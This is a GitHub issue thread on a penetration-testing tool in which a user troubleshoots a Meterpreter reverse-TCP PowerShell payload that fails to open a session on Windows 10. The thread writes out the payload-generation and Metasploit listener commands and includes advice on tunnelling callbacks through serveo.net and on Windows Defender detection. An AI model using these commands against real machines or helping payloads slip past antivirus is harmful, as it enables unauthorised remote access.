### ISSUE TITLE
powershell_attack.txt doesn't work on windows10

### ISSUE THREAD

**Issue by Zaghw** [trustedsec/unicorn#115]
hi there, i am working on a kali VM and i created a poweshell_attack.txt using:
./unicorn.py windows/meterpreter/reverse_tcp 192.168.10.6 4444

and then ran metasploit using the command
msfconsole -r /root/unicorn/unicorn.rc 

i also took the powershell_attack.txt and saved it on my windows 10 host as payload.bat however when i run it no meterpreter session is created. i also tried to copy the text inside powershell_attack.txt and paste it in the cmd but it also didn't work. i would really appreciate it if you could tell me if there's anything i'm doing wrong.
if it helps, this is the text file that was generated by unicorn.py
[powershell_attack.txt](https://github.com/trustedsec/unicorn/files/2950103/powershell_attack.txt)

thanks a lot in advance.

**Comment by tygaking009** [comment]
Windows defender on?

**Comment by Zaghw** [comment]
@tygaking009 no i turned windows defender off and tried again but it didn't work on windows 10 or windows 8. i also downloaded a windows 7 VM and disabled both the firewall and windows defender but that didn't work either.

**Comment by tygaking009** [comment]
Use serveo.net ,Use their ssh to tunnel connections.. then use it to build the payload and try again ..hope it works for you this time cause mine is working perfectly

**Comment by shannonmcmurtrey** [comment]
I am also finding that it gets caught by Defender on the latest update.

**Comment by trustedsec** [comment]
This is to be expected as defender updates on unicorn frequently, there is no need to continue to post it gets snagged. We release updates when we can and is trivial to do, just takes time.

**Comment by hokd2905** [comment]
Hi all, where can I find the <powershell_attack.txt> file on Kali Linux?

**Comment by hokd2905** [comment]
> Hi all, where can I find the <powershell_attack.txt> file on Kali Linux?

@tygaking009 do you know?
